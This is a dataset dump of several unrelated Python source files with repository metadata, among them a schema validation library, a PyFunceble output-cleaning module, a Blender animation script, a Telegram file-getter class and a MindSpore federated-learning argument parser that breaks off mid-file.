| content (string, 7-928k chars) | avg_line_length (float64, 3.5-33.8k) | max_line_length (int64, 6-139k) | alphanum_fraction (float64, 0.08-0.96) | licenses (sequence) | repository_name (string, 7-104 chars) | path (string, 4-230 chars) | size (int64, 7-928k) | lang (string, 1 class) |
|---|---|---|---|---|---|---|---|---|
import math
a1=float(input("Enter a number: "))
print("{} to int is {}".format(a1,math.floor(a1)))
a2=1.5
print(math.trunc(a2))
a3=3.14
print(int(a3))

| 16.888889 | 50 | 0.657895 | ["MIT"] | jhonatanmaia/python | study/curso-em-video/exercises/016.py | 152 | Python |
"""
Copyright (c) 2014-2015 F-Secure
See LICENSE for details
"""
import re
import inspect
import datetime
from copy import copy
from collections import defaultdict
import isodate
import pytz
from .errors import ValidationError, DeclarationError
class BaseField(object):
"""
Superclass for all fields
description (None|string = None)
help text to be shown in schema. This should include the reasons why this field actually needs to exist.
required (bool = False)
flag that specifies if the field has to be present
\*\*kwargs
extra parameters that are not programmatically supported
"""
verbose_name = "unknown_type"
def __init__(self, description=None, required=True, **kwargs):
self.description = description
self.kwargs = kwargs
self.required = required
def _to_python(self, val):
""" Transforms primitive data (e.g. dict, list, str, int, bool, float) to a python object """
return val
def _validate(self, val):
""" Validates incoming data against constraints defined via field declaration """
if self.required and val is None:
raise ValidationError("Value is required and thus cannot be None")
def deserialize(self, val):
""" Converts data passed over the wire or from the script into sth. to be used in python scripts """
rval = self._to_python(val)
self._validate(rval)
return rval
def serialize(self, val):
""" Converts python object into sth. that can be sent over the wire """
return val
def get_schema(self):
rval = {
"description": self.description,
"type": self.verbose_name,
"required": self.required
}
rval.update(self.kwargs)
return rval
class BaseIsoField(BaseField):
""" Represents time entity that can be either a native object or ISO 8601 datetime string.
The item is
`serialized <https://docs.python.org/2/library/datetime.html#datetime.datetime.isoformat>`_ into ISO 8601 string.
"""
def _parse(self, val):
""" Supposed to transform the value into a valid Python type using a respective isodate function """
raise NotImplementedError
def _to_python(self, val):
val = super(BaseIsoField, self)._to_python(val)
if val is None:
return None
if isinstance(val, basestring):
try:
# Parse datetime
val = self._parse(val)
except ValueError:
raise ValidationError("Datetime timestamp has to be a string in ISO 8601 format")
return val
def serialize(self, val):
if val is None:
return None
return val.isoformat()
class DateTimeField(BaseIsoField):
""" datetime object serialized into YYYY-MM-DDThh:mm:ss.sTZD.
E.g.: 2013-09-30T11:32:39.984847 """
verbose_name = "datetime"
def _parse(self, val):
return isodate.parse_datetime(val)
def _to_python(self, val):
val = super(DateTimeField, self)._to_python(val)
if val is None:
return None
# Convert to naive UTC
if hasattr(val, "tzinfo") and val.tzinfo:
val = val.astimezone(pytz.utc)
val = val.replace(tzinfo=None)
return val
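# Editor's note: an illustrative sketch (not part of the original module) of how
# DateTimeField round-trips a value, assuming `isodate` parses offsets as documented;
# timezone-aware input is normalised to naive UTC by _to_python above.
def _example_datetime_roundtrip():
    field = DateTimeField(description="creation timestamp")
    parsed = field.deserialize("2013-09-30T11:32:39+02:00")
    # parsed is datetime.datetime(2013, 9, 30, 9, 32, 39), i.e. naive UTC
    return field.serialize(parsed)  # -> '2013-09-30T09:32:39'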
class DateField(BaseIsoField):
""" date object serialized into YYYY-MM-DD.
E.g.: 2013-09-30 """
verbose_name = "date"
def _parse(self, val):
return isodate.parse_date(val)
class TimeField(BaseIsoField):
""" time object serialized into hh:mm:ssTZD.
E.g.: 11:32:39.984847 """
verbose_name = "time"
def _parse(self, val):
return isodate.parse_time(val)
def _to_python(self, val):
val = super(TimeField, self)._to_python(val)
if val is None:
return None
# Convert to naive UTC
if hasattr(val, "tzinfo") and val.tzinfo:
dt = datetime.datetime.combine(datetime.date.today(), val)
dt = dt.astimezone(pytz.utc)
dt = dt.replace(tzinfo=None)
val = dt.time()
return val
class DurationField(BaseIsoField):
""" timedelta object serialized into PnYnMnDTnHnMnS.
E.g.: P105DT9H52M49.448422S"""
verbose_name = "duration"
def _parse(self, val):
return isodate.parse_duration(val)
def serialize(self, val):
if val is None:
return None
return isodate.duration_isoformat(val)
class BaseSimpleField(BaseField):
python_type = None
def __init__(self, default=None, **kwargs):
super(BaseSimpleField, self).__init__(**kwargs)
try:
self.default = self._to_python(default)
except ValidationError, e:
raise DeclarationError("default: %s" % str(e))
def _to_python(self, val):
if val is None:
return None
try:
return self.python_type(val)
except ValueError:
raise ValidationError("Conversion of value %r failed" % val)
def get_schema(self):
rval = super(BaseSimpleField, self).get_schema()
rval["default"] = self.default
return rval
class IndexableField(BaseSimpleField):
def __init__(self, choices=None, invalid_choices=None, **kwargs):
super(IndexableField, self).__init__(**kwargs)
if choices is not None:
if not isinstance(choices, (list, tuple)):
raise DeclarationError("choices has to be a list or tuple")
tempo = []
for i in xrange(len(choices)):
try:
tempo.append(self._to_python(choices[i]))
except Exception, e:
raise DeclarationError("[%d]: %s" % (i, str(e)))
choices = tempo
if invalid_choices is not None:
if not isinstance(invalid_choices, (list, tuple)):
raise DeclarationError("invalid_choices has to be a list or tuple")
tempo = []
for i in xrange(len(invalid_choices)):
try:
tempo.append(self._to_python(invalid_choices[i]))
except Exception, e:
raise DeclarationError("[%d]: %s" % (i, str(e)))
invalid_choices = tempo
if self.default is not None:
if invalid_choices and self.default in invalid_choices:
raise DeclarationError("default value is in invalid_choices")
if choices and self.default not in choices:
raise DeclarationError("default value is not in choices")
if invalid_choices and choices:
inter = set(choices).intersection(set(invalid_choices))
if inter:
raise DeclarationError("these choices are stated as both valid and invalid: %r" % inter)
self.choices, self.invalid_choices = choices, invalid_choices
def _validate(self, val):
super(IndexableField, self)._validate(val)
if val is None:
return
if self.choices and val not in self.choices:
raise ValidationError("Val %r must be one of %r" % (val, self.choices))
if self.invalid_choices and val in self.invalid_choices:
raise ValidationError("Val %r must NOT be one of %r" % (val, self.invalid_choices))
def get_schema(self):
rval = super(IndexableField, self).get_schema()
rval["choices"] = self.choices
rval["invalid_choices"] = self.invalid_choices
return rval
class DigitField(IndexableField):
""" Base class for fields that represent numbers
min_val (int|long|float = None)
Minimum threshold for incoming value
max_val (int|long|float = None)
Maximum threshold for incoming value
"""
def __init__(self, min_val=None, max_val=None, **kwargs):
super(DigitField, self).__init__(**kwargs)
min_val = self._to_python(min_val)
max_val = self._to_python(max_val)
value_check = min_val or max_val
if self.choices is not None and value_check is not None:
raise DeclarationError("choices and min or max value limits do not make sense together")
if min_val is not None and max_val is not None:
if max_val < min_val:
raise DeclarationError("max val is less than min_val")
if self.default is not None:
if min_val is not None and self.default < min_val:
raise DeclarationError("default value is too small")
if max_val is not None and self.default > max_val:
raise DeclarationError("default value is too big")
self.min_val, self.max_val = min_val, max_val
def _to_python(self, val):
if not isinstance(val, (basestring, int, long, float, type(None))):
raise ValidationError("Has to be a digit or a string convertable to digit")
return super(DigitField, self)._to_python(val)
def _validate(self, val):
super(DigitField, self)._validate(val)
if val is None:
return
if self.min_val is not None and val < self.min_val:
raise ValidationError("Digit %r is too small. Has to be at least %r." % (val, self.min_val))
if self.max_val is not None and val > self.max_val:
raise ValidationError("Digit %r is too big. Has to be at max %r." % (val, self.max_val))
def get_schema(self):
rval = super(DigitField, self).get_schema()
rval.update({
"min_val": self.min_val,
"max_val": self.max_val
})
return rval
class IntegerField(DigitField):
""" Transforms input data that could be any number or a string value with that number into *long* """
python_type = long
verbose_name = "int"
class FloatField(DigitField):
""" Transforms input data that could be any number or a string value with that number into *float* """
python_type = float
verbose_name = "float"
class StringField(IndexableField):
""" Represents any arbitrary text
regex (string = None)
`Python regular expression <https://docs.python.org/2/library/re.html#regular-expression-syntax>`_
used to validate the string.
min_length (int = None)
Minimum size of string value
max_length (int = None)
Maximum size of string value
"""
python_type = unicode
verbose_name = "string"
def __init__(self, regex=None, min_length=None, max_length=None, **kwargs):
super(StringField, self).__init__(**kwargs)
def _set(name, transform_f, val):
if val is not None:
try:
val = transform_f(val)
except Exception, e:
raise DeclarationError("%s: %s" % (name, str(e)))
setattr(self, name, val)
val_check = min_length or max_length or regex
if self.choices and val_check is not None:
raise DeclarationError("choices and value checkers do not make sense together")
_set("regex", re.compile, regex)
_set("min_length", int, min_length)
_set("max_length", int, max_length)
def _to_python(self, val):
if not isinstance(val, (basestring, type(None))):
raise ValidationError("Has to be string")
return super(StringField, self)._to_python(val)
def _validate(self, val):
super(StringField, self)._validate(val)
if val is None:
return
if self.min_length is not None:
if len(val) < self.min_length:
raise ValidationError("Length is too small. Is %r has to be at least %r." % (len(val),
self.min_length))
if self.max_length is not None:
if len(val) > self.max_length:
raise ValidationError("Length is too small. Is %r has to be at least %r." % (len(val),
self.max_length))
reg = self.regex
if reg is not None:
if not reg.match(val):
raise ValidationError("%r did not match regexp %r" % (val, reg.pattern))
def get_schema(self):
rval = super(StringField, self).get_schema()
rval.update({
"regex": getattr(self.regex, "pattern", None),
"min_length": self.min_length,
"max_length": self.max_length})
return rval
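# Editor's note: an illustrative sketch (not part of the original module) of the
# StringField constraints described above (regex plus length bounds).
def _example_string_constraints():
    field = StringField(regex=r"^[a-z]+$", min_length=3, max_length=10)
    name = field.deserialize("alpha")  # matches the pattern and the length bounds
    try:
        field.deserialize("ab")  # too short: min_length is 3
    except ValidationError:
        pass
    return name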
class BooleanField(BaseSimpleField):
""" Expects only a boolean value as incoming data """
verbose_name = "boolean"
python_type = bool
def _to_python(self, val):
if not isinstance(val, (bool, type(None))):
raise ValidationError("Has to be a digit or a string convertable to digit")
return super(BooleanField, self)._to_python(val)
PRIMITIVE_TYPES_MAP = {
int: IntegerField,
float: FloatField,
str: StringField,
unicode: StringField,
basestring: StringField,
bool: BooleanField
}
def wrap_into_field(simple_type):
if not isinstance(simple_type, BaseField):
field_class = PRIMITIVE_TYPES_MAP.get(simple_type, None)
if field_class:
return field_class()
else:
return ObjectField(simple_type)
return simple_type
class ListField(BaseField):
""" Represents a collection of primitives. Serialized into a list.
item_type (python primitive|Field instance)
value is used by list field to validate individual items
python primitive are internally mapped to Field instances according to
:data:`PRIMITIVE_TYPES_MAP <resource_api.interfaces.PRIMITIVE_TYPES_MAP>`
"""
verbose_name = "list"
def __init__(self, item_type, **kwargs):
super(ListField, self).__init__(**kwargs)
self.item_type = wrap_into_field(item_type)
def deserialize(self, val):
self._validate(val)
if val is None:
return val
errors = []
rval = []
if not isinstance(val, list):
raise ValidationError("Has to be list")
for item in val:
try:
rval.append(self.item_type.deserialize(item))
except ValidationError, e:
errors.append([val.index(item), e.message])
if errors:
raise ValidationError(errors)
return rval
def get_schema(self):
rval = super(ListField, self).get_schema()
rval["schema"] = self.item_type.get_schema()
return rval
def serialize(self, val):
return [self.item_type.serialize(item) for item in val]
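# Editor's note: an illustrative sketch (not part of the original module). A primitive
# item type such as `int` is wrapped into an IntegerField via wrap_into_field, and
# per-item validation errors are collected together with the item index.
def _example_list_of_ints():
    field = ListField(int, description="port numbers")
    return field.deserialize(["80", 443, 8080])  # -> [80, 443, 8080]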
class ObjectField(BaseField):
""" Represents a nested document/mapping of primitives. Serialized into a dict.
schema (class):
schema to be used for validation of the nested document, it does not have to be Schema subclass - just a
collection of fields
ObjectField can be declared via two different ways.
First, if there is a reusable schema defined elsewhere:
>>> class Sample(Schema):
>>> object_field = ObjectField(ExternalSchema, required=False, description="Zen")
Second, if the field is supposed to have a unique custom schema:
>>> class Sample(Schema):
>>> object_field = ObjectField(required=False, description="Zen", schema={
>>> "foo": StringField()
>>> })
"""
verbose_name = "dict"
def __init__(self, schema, **kwargs):
super(ObjectField, self).__init__(**kwargs)
if isinstance(schema, dict):
class Tmp(Schema):
pass
for key, value in schema.iteritems():
setattr(Tmp, key, value)
schema = Tmp
elif inspect.isclass(schema) and not issubclass(schema, Schema):
class Tmp(schema, Schema):
pass
schema = Tmp
self._schema = schema()
def deserialize(self, val):
self._validate(val)
if val is None:
return val
return self._schema.deserialize(val)
def get_schema(self):
return {
"type": self.verbose_name,
"schema": self._schema.get_schema()
}
def serialize(self, val):
return self._schema.serialize(val)
class Schema(object):
""" Base class for containers that would hold one or many fields.
It has one class attribute that may be used to alter the schema's validation flow
has_additional_fields (bool = False)
If *True* it shall be possible to have extra fields inside input data that will not be validated
NOTE: when defining schemas do not use any of the following reserved keywords:
- find_fields
- deserialize
- get_schema
- serialize
- has_additional_fields
"""
has_additional_fields = False
def __init__(self, validate_required_constraint=True, with_errors=True):
self._required_fields = set()
self._defaults = {}
self._validate_required_constraint, self._with_errors = validate_required_constraint, with_errors
self.fields = {}
for field_name in dir(self):
field = getattr(self, field_name)
if not isinstance(field, BaseField):
continue
self._add_field(field_name, copy(field))
def _add_field(self, field_name, field):
setattr(self, field_name, field)
self.fields[field_name] = field
if isinstance(field, BaseField) and field.required:
self._required_fields.add(field_name)
if isinstance(field, BaseSimpleField) and field.default is not None:
self._defaults[field_name] = field.default
def find_fields(self, **kwargs):
""" Returns a set of fields where each field contains one or more specified keyword arguments """
rval = set()
for key, value in kwargs.iteritems():
for field_name, field in self.fields.iteritems():
if field.kwargs.get(key) == value:
rval.add(field_name)
return rval
def deserialize(self, data, validate_required_constraint=True, with_errors=True):
""" Validates and transforms input data into something that is used withing data access layer
data (dict)
Incoming data
validate_required_constraint (bool = True)
If *False*, schema will not validate required constraint of the fields inside
with_errors (bool = True)
If *False*, all fields that contain errors are silently excluded
@raises ValidationError
When one or more fields have errors and *with_errors=True*
"""
if not isinstance(data, dict):
raise ValidationError({"__all__": "Has to be a dict"})
transformed = dict(self._defaults)
errors = defaultdict(list)
for key, value in data.iteritems():
field = self.fields.get(key)
if field is None:
if self.has_additional_fields:
transformed[key] = value
else:
errors["__all__"].append("Field %r is not defined" % key)
continue
try:
transformed[key] = field.deserialize(value)
except ValidationError, e:
errors[key].append(e.message)
if validate_required_constraint:
for field in self._required_fields:
if transformed.get(field) is None and field not in errors:
errors[field].append("Required field is missing")
if errors and with_errors:
raise ValidationError(errors)
else:
return transformed
def get_schema(self):
""" Returns a JSONizable schema that could be transfered over the wire """
rval = {}
for field_name, field in self.fields.iteritems():
rval[field_name] = field.get_schema()
if self.has_additional_fields:
rval["has_additional_fields"] = True
return rval
def serialize(self, val):
""" Transforms outgoing data into a JSONizable dict """
rval = {}
for key, value in val.iteritems():
field = self.fields.get(key)
if field:
rval[key] = field.serialize(value)
elif self.has_additional_fields:
rval[key] = value
else:
pass
return rval
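# Editor's note: an illustrative usage sketch (not part of the original module) that
# ties the pieces together: fields declared on a Schema subclass are collected by
# __init__, defaults are filled in, and unknown keys are rejected unless
# has_additional_fields is True. The schema and field names below are hypothetical.
class _ExampleUserSchema(Schema):
    name = StringField(min_length=1, description="display name")
    age = IntegerField(min_val=0, required=False)
    active = BooleanField(default=True, required=False)
def _example_schema_deserialize():
    schema = _ExampleUserSchema()
    # -> {"name": u"Alice", "age": 30, "active": True}
    return schema.deserialize({"name": "Alice", "age": 30})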
| 33.310178 | 117 | 0.61065 | ["Apache-2.0"] | F-Secure/resource-api | src/resource_api/schema.py | 20,619 | Python |
"""
The tool to check the availability or syntax of domains, IPv4, IPv6 or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the cleaning interface.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io///en/master/
Project homepage:
https://pyfunceble.github.io/
License:
::
MIT License
Copyright (c) 2017, 2018, 2019, 2020 Nissar Chababy
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from os import sep as directory_separator
from os import walk
import PyFunceble
class Clean:
"""
Provide the cleaning logic.
.. note::
By cleaning we mean the cleaning of the :code:`output` directory.
:param list_to_test: The list of domains we are testing.
:type list_to_test: list|None
:param bool clean_all:
Tell the subsystem if we need to clean all.
Which includes, of course, the output directory but also
all other file(s) generated by our system.
:param str file_path:
The path to the file we tested.
.. note::
This is only relevant if you use the MariaDB/MySQL database.
"""
def __init__(self, clean_all=False, file_path=None):
# We clean the output directory.
self.almost_everything(clean_all, file_path)
@classmethod
def file_to_delete(cls, all_files=False):
"""
Return the list of files to delete.
"""
# We initiate the directory we have to look for.
directory = "{0}{1}".format(
PyFunceble.OUTPUT_DIRECTORY, PyFunceble.OUTPUTS.parent_directory
)
if not directory.endswith(directory_separator): # pragma: no cover
# For safety, if it does not end with the directory separator, we append it
# to its end.
directory += directory_separator
# We initiate a variable which will save the list of files to delete.
result = []
for root, _, files in walk(directory):
# We walk in the directory and get all files and sub-directories.
for file in files:
# If there is files in the current sub-directory, we loop
# through the list of files.
if file in [".gitignore", ".keep"]:
continue
if (
not all_files and "logs" in root and ".log" in file
): # pragma: no cover
continue
# The file is not in the list of files to keep, so it has to be deleted.
if root.endswith(directory_separator):
# The root ends with the directory separator.
# We construct the path and append the full path to the result.
result.append(root + file)
else:
# The root directory does not end with the directory separator.
# We construct the path by appending the directory separator
# between the root and the filename and append the full path to
# the result.
result.append(root + directory_separator + file) # pragma: no cover
# We return our list of files to delete.
return result
@classmethod
def databases_to_delete(cls): # pragma: no cover
"""
Set the database files to delete.
"""
# We initiate the result variable.
result = []
if PyFunceble.CONFIGURATION.db_type == "json":
# We initiate the directory we have to look for.
directory = PyFunceble.CONFIG_DIRECTORY
# We append the dir_structure file.
result.append(
"{0}{1}".format(
directory, PyFunceble.OUTPUTS.default_files.dir_structure
)
)
# We append the iana file.
result.append(
"{0}{1}".format(directory, PyFunceble.OUTPUTS.default_files.iana)
)
# We append the public suffix file.
result.append(
"{0}{1}".format(
directory, PyFunceble.OUTPUTS.default_files.public_suffix
)
)
# We append the inactive database file.
result.append(
"{0}{1}".format(directory, PyFunceble.OUTPUTS.default_files.inactive_db)
)
# We append the mining database file.
result.append(
"{0}{1}".format(directory, PyFunceble.OUTPUTS.default_files.mining)
)
return result
def almost_everything(self, clean_all=False, file_path=False):
"""
Delete almost all discovered files.
:param bool clean_all:
Tell the subsystem if we have to clean everything instead
of almost everything.
"""
if (
"do_not_clean" not in PyFunceble.INTERN
or not PyFunceble.INTERN["do_not_clean"]
):
# We get the list of file to delete.
to_delete = self.file_to_delete(clean_all)
if (
not PyFunceble.abstracts.Version.is_local_cloned() and clean_all
): # pragma: no cover
to_delete.extend(self.databases_to_delete())
for file in to_delete:
# We loop through the list of file to delete.
# And we delete the currently read file.
PyFunceble.helpers.File(file).delete()
PyFunceble.LOGGER.info(f"Deleted: {file}")
if clean_all: # pragma: no cover
to_avoid = ["whois"]
else:
to_avoid = ["whois", "auto_continue", "inactive", "mining"]
if not file_path:
query = "DELETE FROM {0}"
else: # pragma: no cover
query = "DELETE FROM {0} WHERE file_path = %(file_path)s"
if PyFunceble.CONFIGURATION.db_type in [
"mariadb",
"mysql",
]: # pragma: no cover
with PyFunceble.engine.MySQL() as connection:
for database_name in [
y
for x, y in PyFunceble.engine.MySQL.tables.items()
if x not in to_avoid
]:
lquery = query.format(database_name)
with connection.cursor() as cursor:
cursor.execute(lquery, {"file_path": file_path})
PyFunceble.LOGGER.info(
"Cleaned the data related to "
f"{repr(file_path)} from the {database_name} table."
)
if (
not PyFunceble.abstracts.Version.is_local_cloned() and clean_all
): # pragma: no cover
PyFunceble.load_config()
PyFunceble.LOGGER.info(f"Reloaded configuration.")
| 34.65748 | 88 | 0.546291 | ["MIT"] | NeolithEra/PyFunceble | PyFunceble/output/clean.py | 9,585 | Python |
class BaseFileGetter:
async def get_file(self, file_id: str):
raise NotImplementedError()
async def get_userpic(self, user_id: int):
raise NotImplementedError()
async def get_thumb(self, message):
"""
Тупой алгоритм,
который рекурсивно с конца ищет поле "thumb"
и если находит, возвращает его
"""
if isinstance(message, list):
values = list(enumerate(message))
elif isinstance(message, dict):
values = list(message.items())
else:
return
values.reverse()
for k, v in values:
if k == "reply_to_message":
continue
if isinstance(v, dict):
if "thumb" in v:
return v["thumb"]
if result := await self.get_thumb(v):
return result
async def get_document(self, message):
"""
Тупой алгоритм,
который рекурсивно с конца ищет поле "file_id"
и если находит, возвращает его родителя
"""
if isinstance(message, list):
values = list(enumerate(message))
elif isinstance(message, dict):
values = list(message.items())
else:
return
values.reverse()
for k, v in values:
if k == "reply_to_message":
continue
if isinstance(v, dict):
if "file_id" in v:
return v
if result := await self.get_document(v):
return result
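# Editor's note: an illustrative sketch (not part of the original module) using a
# hypothetical Telegram-like payload. get_thumb() walks nested dicts from the end
# and returns the first "thumb" it finds; get_document() returns the dict that
# carries a "file_id".
async def _example_lookup(getter):
    message = {"message_id": 1,
               "video": {"file_id": "vid", "thumb": {"file_id": "vid_thumb"}}}
    thumb = await getter.get_thumb(message)        # -> {"file_id": "vid_thumb"}
    document = await getter.get_document(message)  # -> the whole "video" dict
    return thumb, document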
| 29.622642 | 54 | 0.52293 | ["MIT"] | Forevka/tgquote | tgquote/filegetters/base.py | 1,716 | Python |
"""
ANIMATE RIGID OBJECTS IN BLENDER.
Requirements:
------------------------------------------------------------------------------
IMPORTANT! This has only been tested with Blender 2.79 API.
Warnings:
------------------------------------------------------------------------------
Do not expect all blends to be perfect; we did additional filtering of
generated blends to ensure that random data is well-formed.
Execution:
------------------------------------------------------------------------------
This script is intended to run inside blender launched in background mode.
Sample invocation is:
blender --background --python-exit-code 1 --factory-startup \
--python blender/animate_main.py -- \
--set_env_lighting_image=$ENVMAPS \
--obj_file="$OBJ" \
--output_blend="$OFILE"
Capabilities:
------------------------------------------------------------------------------
Uses Blender's rigid body simulator to animate objects in the input file and
output a blend file with the animation.
"""
import bpy
import argparse
import logging
import math
import os
import sys
import random
import time
import traceback
# Add to path to make sure we can import modules inside Blender.
__sdir = os.path.dirname(os.path.realpath(__file__))
if __sdir not in sys.path:
sys.path.append(__sdir)
import rigid_body_util
import geo_util
import render_util
LOG = logging.getLogger(__name__)
if __name__ == "__main__":
try:
# FLAGS
# --------------------------------------------------------------------------
parser = argparse.ArgumentParser(
description='Utility to animate shapenet models randomly.')
parser.add_argument(
'--obj_file', action='store', type=str, required=True,
help='Input OBJ file.')
parser.add_argument(
'--simple_diagnostic', action='store_true', default=False,
help='If true, does not animate, but just imports and runs diagnostic info.')
parser.add_argument(
'--set_env_lighting_image', action='store', default='',
help='Image or directory of images; set to set environment lighting.')
parser.add_argument(
'--p_breaking', action='store', type=float, default=0.5,
help='Probability of breaking.')
parser.add_argument(
'--p_cam_track', action='store', type=float, default=0.5)
parser.add_argument(
'--p_bouncy', action='store', type=float, default=0.3)
parser.add_argument(
'--p_warp_time', action='store', type=float, default=0.3)
parser.add_argument(
'--p_tilt_floor', action='store', type=float, default=0.2)
parser.add_argument(
'--diagnostic_frame_prefix', action='store', default='')
parser.add_argument(
'--output_blend', action='store', type=str, required=True)
# Parse only arguments after --
# --------------------------------------------------------------------------
argv = sys.argv
if "--" not in argv:
argv = [] # as if no args are passed
else:
argv = argv[argv.index("--") + 1:]
args = parser.parse_args(argv)
random.seed(time.time())
render_util.set_width_height(1500, 1500)
if args.set_env_lighting_image:
render_util.setup_realistic_lighting(args.set_env_lighting_image, 3.0, False)
if args.simple_diagnostic:
rigid_body_util.obj_import_diagnostic(args.obj_file)
cam = geo_util.create_random_camera(
geo_util.BBox([-1.0,-1.0,0.0], [1.0, 1.0, 1.0]),
1.0, 1.0, 1.0)
else:
floor, objects = rigid_body_util.obj_import_animate(
args.obj_file,
allow_breaking=(random.random() < args.p_breaking))
cam = geo_util.create_random_camera(
geo_util.BBox([-1.0,-1.0,0.0], [1.0, 1.0, 1.0]),
1.0, 1.0, 1.0)
# Note: one can't truly slow down the simulation without altering
# the result in blender; empirically this gives a reasonable alternative
# timing
if random.random() < args.p_warp_time:
rigid_body_util.set_rigidbody_world_properties(
steps_per_sec=60, time_scale=0.5, solver_its=random.randint(3, 6))
if random.random() < args.p_tilt_floor:
axis = random.randint(0, 1)
angle = random.uniform(-math.pi * 0.2, math.pi * 0.2)
floor.rotation_euler[axis] = angle
if random.random() < args.p_bouncy:
restitution = random.uniform(0.38, 0.5)
for ob in objects + [floor]:
ob.rigid_body.restitution = restitution
if random.random() < args.p_cam_track:
geo_util.add_camera_track_constraint(
cam, objects[random.randint(0, len(objects) - 1)])
# bpy.context.scene.world.light_settings.samples = 2
bpy.ops.file.pack_all()
print('Saving blend to %s' % args.output_blend.replace('.blend', '_unbaked.blend'))
geo_util.save_blend(args.output_blend.replace('.blend', '_unbaked.blend'))
rigid_body_util.bake_simulation_bugfix()
print('Saving blend to %s' % args.output_blend)
geo_util.save_blend(args.output_blend)
if len(args.diagnostic_frame_prefix) > 0:
render_util.render_animation(args.diagnostic_frame_prefix, 1)
except Exception as e:
tb = traceback.format_exc()
LOG.critical(tb)
LOG.critical('Script failed')
raise e
| 37.385621 | 91 | 0.568182 | ["MIT"] | creativefloworg/creativeflow | creativeflow/blender/animate_main.py | 5,720 | Python |
"""search init"""
from pathfinder.search.algorithm import Algorithm
| 22.666667 | 49 | 0.794118 | ["MIT"] | rpfarish/pathfinder_visualizer | pathfinder/search/__init__.py | 68 | Python |
import cv2
import numpy as np
green = np.uint8([[[0,255,0]]])  # pure green in BGR order
hsv_green = cv2.cvtColor(green,cv2.COLOR_BGR2HSV)
print(hsv_green)
| 19.428571 | 50 | 0.705882 | ["MIT"] | KiLJ4EdeN/CV_PYTHON | CV_PYTHON/IMG_2.py | 136 | Python |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import argparse
import numpy as np
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.nn import TrainOneStepCell, WithLossCell
from src.model import LeNet5
from src.adam import AdamWeightDecayOp
parser = argparse.ArgumentParser(description="test_fl_lenet")
parser.add_argument("--device_target", type=str, default="CPU")
parser.add_argument("--server_mode", type=str, default="FEDERATED_LEARNING")
parser.add_argument("--ms_role", type=str, default="MS_WORKER")
parser.add_argument("--worker_num", type=int, default=0)
parser.add_argument("--server_num", type=int, default=1)
parser.add_argument("--scheduler_ip", type=str, default="127.0.0.1")
parser.add_argument("--scheduler_port", type=int, default=8113)
parser.add_argument("--fl_server_port", type=int, default=6666)
parser.add_argument("--start_fl_job_threshold", type=int, default=1)
parser.add_argument("--start_fl_job_time_window", type=int, default=3000)
parser.add_argument("--update_model_ratio", type=float, default=1.0)
parser.add_argument("--update_model_time_window", type=int, default=3000)
parser.add_argument("--fl_name", type=str, default="Lenet")
parser.add_argument("--fl_iteration_num", type=int, default=25)
parser.add_argument("--client_epoch_num", type=int, default=20)
parser.add_argument("--client_batch_size", type=int, default=32)
parser.add_argument("--client_learning_rate", type=float, default=0.1)
parser.add_argument("--scheduler_manage_port", type=int, default=11202)
parser.add_argument("--config_file_path", type=str, default="")
parser.add_argument("--encrypt_type", type=str, default="NOT_ENCRYPT")
# parameters for encrypt_type='DP_ENCRYPT'
parser.add_argument("--dp_eps", type=float, default=50.0)
parser.add_argument("--dp_delta", type=float, default=0.01) # 1/worker_num
parser.add_argument("--dp_norm_clip", type=float, default=1.0)
# parameters for encrypt_type='PW_ENCRYPT'
parser.add_argument("--share_secrets_ratio", type=float, default=1.0)
parser.add_argument("--cipher_time_window", type=int, default=300000)
parser.add_argument("--reconstruct_secrets_threshold", type=int, default=3)
args, _ = parser.parse_known_args()
device_target = args.device_target
server_mode = args.server_mode
ms_role = args.ms_role
worker_num = args.worker_num
server_num = args.server_num
scheduler_ip = args.scheduler_ip
scheduler_port = args.scheduler_port
fl_server_port = args.fl_server_port
start_fl_job_threshold = args.start_fl_job_threshold
start_fl_job_time_window = args.start_fl_job_time_window
update_model_ratio = args.update_model_ratio
update_model_time_window = args.update_model_time_window
share_secrets_ratio = args.share_secrets_ratio
cipher_time_window = args.cipher_time_window
reconstruct_secrets_threshold = args.reconstruct_secrets_threshold
fl_name = args.fl_name
